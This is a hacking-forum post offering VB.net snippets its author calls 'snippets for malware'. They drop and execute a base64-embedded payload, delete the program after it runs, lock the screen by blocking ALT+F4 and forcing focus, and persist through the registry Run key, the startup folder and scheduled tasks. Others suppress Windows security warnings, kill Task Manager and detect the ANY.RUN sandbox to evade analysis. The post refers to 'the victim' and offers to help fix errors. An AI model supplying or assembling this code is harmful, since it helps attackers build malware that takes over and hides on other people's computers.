Become King Of Hell

VB.net Code snippets for malware

Dexter

Hellcoins
♆472
Username Style (Gradient Colours)
Drop & execute file from Base64:

First, convert your payload to base64 at https://tomeko.net/online_tools/file_to_base64.php

Now the code snippet (requires Imports System.IO ):
Code:
Dim byt As Byte() = Convert.FromBase64String("")
IO.File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\" & "example.exe", byt)
Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\" & "example.exe")
Make sure to replace the blank area with your converted string.

Self Deletion:
Code:
Dim piDestruct As ProcessStartInfo = New ProcessStartInfo()

piDestruct.Arguments = "/C choice /C Y /N /D Y /T 3 & Del " _
& Application.ExecutablePath
piDestruct.WindowStyle = ProcessWindowStyle.Hidden
piDestruct.CreateNoWindow = True
piDestruct.FileName = "cmd.exe"

Process.Start(piDestruct)

Application.Exit()
Does what it says, exits then deletes itself.

Prevent ALT+F4 on form:
Code:
Protected Overrides ReadOnly Property CreateParams() As CreateParams
        Get
            Dim cp As CreateParams = MyBase.CreateParams
            Const CS_NOCLOSE As Integer = &H200
            cp.ClassStyle = cp.ClassStyle Or CS_NOCLOSE
            Return cp
        End Get
    End Property
This will prevent anyone from using ALT+F4 to close your window. Useful for screenlockers.

Focus form:
Code:
        Me.Activate()
        Me.Focus()
Another snippet useful for screenlockers, put this in a timer with a interval, not too low as it completely refocuses the window.
Combined with the Prevent ALT + F4 snippet it will focus over even task manager and the taskbar.

Registry startup:
Code:
My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)

Sets your program in the registry to run automatically. (Shows in startup tab in task manager)

Copy self to startup:
Code:
        If IO.File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\example.exe") Then
            ''Not doing anything here, but you can if you want.
        Else
            IO.File.Copy(Application.ExecutablePath(), Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\example.exe")
        End If

Copies your program to startup folder. (Shows in startup tab in task manager)

Prevent "Are you sure you want to run this software?"
Code:
        Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User)
You should use this with any startup method to make it run without an alert.

Anti Taskmgr:
Code:
  Dim process As Process
        For Each process In Process.GetProcessesByName("taskmgr")
            Try
                process.Kill()
            Catch ex As Exception
            End Try
        Next
You should put this in a timer with a low interval, you can also change the "taskmgr" to any .exe name like chrome.
It is also possible to make this end the application when it detects one is started.
For example, changing process.Kill() to Application.Exit() will make the program stop itself when taskmgr is opened.
(Good persistence with scheduled tasks if the victim is to open taskmgr often and is paranoid.)

Detect ANY.RUN sandbox:
Code:
 If Environment.UserName = "admin" And System.Windows.Forms.SystemInformation.ComputerName = "USER-PC" Then
            ''ANY.RUN was detected.
            Me.Close()
        Else
           ''ANY.RUN was not detected here.

End If
Detects ANY.RUN sandbox, if detected it will close. Can cause false-positives with completely default setup installations.

Scheduled tasks:
Code:
                    Interaction.Shell(("schtasks /delete /tn Example /f"), AppWinStyle.Hide, True, &H1388)
                    Interaction.Shell(("schtasks /create /sc minute /mo 1 /tn Example /tr " & AppDomain.CurrentDomain.BaseDirectory & IO.Path.GetFileName(Application.ExecutablePath)), AppWinStyle.Hide, True, &H1388)
This will schedule your program to start every minute at any startup. You can also change "Example" to any name you want.

If you prefer C# instead of VB.net you can try to convert code here: https://converter.telerik.com/
Run into errors? I can try to fix it for you.

These are basic snippets i've taken/made over the years when experimenting with coding malware. Enjoy.